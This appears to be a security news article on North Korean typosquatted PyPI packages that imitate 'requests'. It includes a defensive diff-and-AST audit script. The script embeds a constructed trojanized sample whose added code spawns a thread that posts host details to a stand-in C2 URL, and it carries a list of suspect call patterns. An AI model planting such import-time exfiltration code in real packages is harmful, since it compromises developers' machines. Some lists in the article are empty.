In early August, ReversingLabs spotted “VMConnect”, a malicious software supply chain campaign that placed two dozen rogue Python packages on PyPI.
Those packages mimicked the following known open-source Python tools:
ReversingLabs researchers have since identified further malicious packages in the PyPI repository that they attribute to a North Korean threat actor.
After analysing the packages and decrypting their payloads, the analysts traced them to Labyrinth Chollima, a sub-group of the well-known North Korean state-sponsored Lazarus Group.
In recent years, malicious actors have repeatedly imitated open-source packages, using tactics such as typosquatting to trick busy developers into installing malware.
The malicious packages identified in this follow-up are:
The first of the three new packages poses as a table editing tool, while the other two imitate the ‘requests’ Python library, appending ‘plus’ and ‘pro’ to the name so that they look like enhanced versions of the legitimate package.
Beyond the typosquatted names, the actors copied the description and source files of the genuine ‘requests’ package essentially unchanged, so a casual inspection shows nothing unusual.
The only modification to the copied code is a few lines added to “__init__.py” that launch a thread executing a function from the “cookies.py” file, so the payload runs as soon as the package is imported.
That function in cookies.py gathers information about the machine and sends it via an HTTP POST to a C2 server URL, then retrieves a token via an HTTP GET request to a second C2 server URL.
With that token, the infected host receives a double-encrypted Python module together with execution parameters; it decodes the module and downloads the next malware stage from a URL the module provides.
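The behaviour described above (a faithful copy of a legitimate package, changed only by a few lines that spawn a thread into a second module which then talks to a C2) suggests a simple audit: diff the suspect package against the pristine upstream release file by file, then AST-scan only the files that differ for thread creation, network calls and code-loading primitives. The following is an added example written for this article, not code from ReversingLabs or from the packages described; the `pkg` sample trees, the `c2.invalid` URL and the `SUSPECT_CALLS` list are constructed for illustration.

```python
import ast
import hashlib
import tempfile
from pathlib import Path

# Constructed sample (not the real packages): a tiny "pristine" package and a
# copy trojanized the way the article describes.
PRISTINE = {
    "pkg/__init__.py": "from .api import get\n",
    "pkg/api.py": "def get(url):\n    return url\n",
    "pkg/cookies.py": "def jar():\n    return {}\n",
}
TROJANIZED = dict(PRISTINE)
TROJANIZED["pkg/__init__.py"] += (  # a few added lines start a thread into cookies.py
    "import threading\nfrom .cookies import _run\n"
    "threading.Thread(target=_run, daemon=True).start()\n"
)
TROJANIZED["pkg/cookies.py"] += (  # new function profiles the host and POSTs it out
    "import platform, urllib.request\n"
    "def _run():\n"
    "    urllib.request.urlopen('http://c2.invalid/', data=str(platform.uname()).encode())\n"
)

# Call targets that do not belong in a "copy" of a pure-Python client library.
# A trailing '.' means "anything in that module". Hypothetical list; extend as needed.
SUSPECT_CALLS = ("threading.Thread", "urllib.request.", "requests.get", "requests.post",
                 "socket.socket", "subprocess.", "base64.b64decode", "marshal.loads",
                 "exec", "eval", "compile")

def write_tree(files, root):
    """Materialise a {relative path: source} mapping under root."""
    for rel, src in files.items():
        path = Path(root) / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(src)

def file_digests(root):
    """SHA-256 of every file under root, keyed by POSIX relative path."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}

def changed_files(pristine_root, suspect_root):
    """Classify each path as added / removed / modified between the two trees."""
    good, bad = file_digests(pristine_root), file_digests(suspect_root)
    kinds = {}
    for rel in sorted(set(good) | set(bad)):
        if rel not in bad:
            kinds[rel] = "removed"
        elif rel not in good:
            kinds[rel] = "added"
        elif good[rel] != bad[rel]:
            kinds[rel] = "modified"
    return kinds

def _dotted(node):
    """Rebuild 'a.b.c' for a call target; 'x().y' resolves to the callee of x."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else None
    if isinstance(node, ast.Call):
        return _dotted(node.func)
    return None

def suspicious_calls(source):
    """Distinct suspect call targets in a Python source, in order of appearance."""
    found = []
    for node in ast.walk(ast.parse(source)):
        name = _dotted(node.func) if isinstance(node, ast.Call) else None
        if name and name not in found and any(
                name == p or name.startswith(p.rstrip(".") + ".") for p in SUSPECT_CALLS):
            found.append(name)
    return found

def audit_dirs(pristine_root, suspect_root):
    """Diff two unpacked packages and AST-scan every added or modified .py file."""
    changes = changed_files(pristine_root, suspect_root)
    findings = {}
    for rel, kind in changes.items():
        if kind != "removed" and rel.endswith(".py"):
            calls = suspicious_calls((Path(suspect_root) / rel).read_text())
            if calls:
                findings[rel] = calls
    return {"changed": changes, "findings": findings}

def audit(pristine_files, suspect_files):
    """Same as audit_dirs for in-memory trees (written to a temp dir first)."""
    with tempfile.TemporaryDirectory() as tmp:
        good, bad = Path(tmp) / "good", Path(tmp) / "bad"
        write_tree(pristine_files, good)
        write_tree(suspect_files, bad)
        return audit_dirs(good, bad)

if __name__ == "__main__":
    report = audit(PRISTINE, TROJANIZED)
    for rel, kind in report["changed"].items():
        print(f"{kind:9} {rel}  {report['findings'].get(rel, '')}")
```

In practice you would point `audit_dirs` at two unpacked source distributions, for example the genuine release fetched with `pip download --no-deps --no-binary :all: requests==<version>` and the suspect lookalike fetched the same way. Because the attackers copied everything else verbatim, the diff collapses to the handful of files that matter, and an AST scan of only those files avoids false positives from the legitimate library's own networking code. The scan is a triage aid, not a verdict: obfuscated or string-built call names will not match, which is exactly why the diff step comes first.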
As in the earlier VMConnect campaign, the C2 server withheld further commands until it saw a suitable target, which made assessing the full scope of the campaign difficult.
While investigating VMConnect, ReversingLabs tried to connect it with other known malware campaigns and found indications linking it to the Lazarus Group, a North Korean APT group.
Further investigation turned up the py_QRcode package described in a July 2023 JPCERT/CC report (https://blogs.jpcert.or.jp/en/2023/07/dangerouspassword_dev.html). That package was never published on PyPI, which raises the question of how the malware tied to it reached its victims.
Code similarities between VMConnect and the JPCERT/CC findings tie both to the Lazarus Group, confirming North Korean state sponsorship.
Command and control (C2) domains and IP address: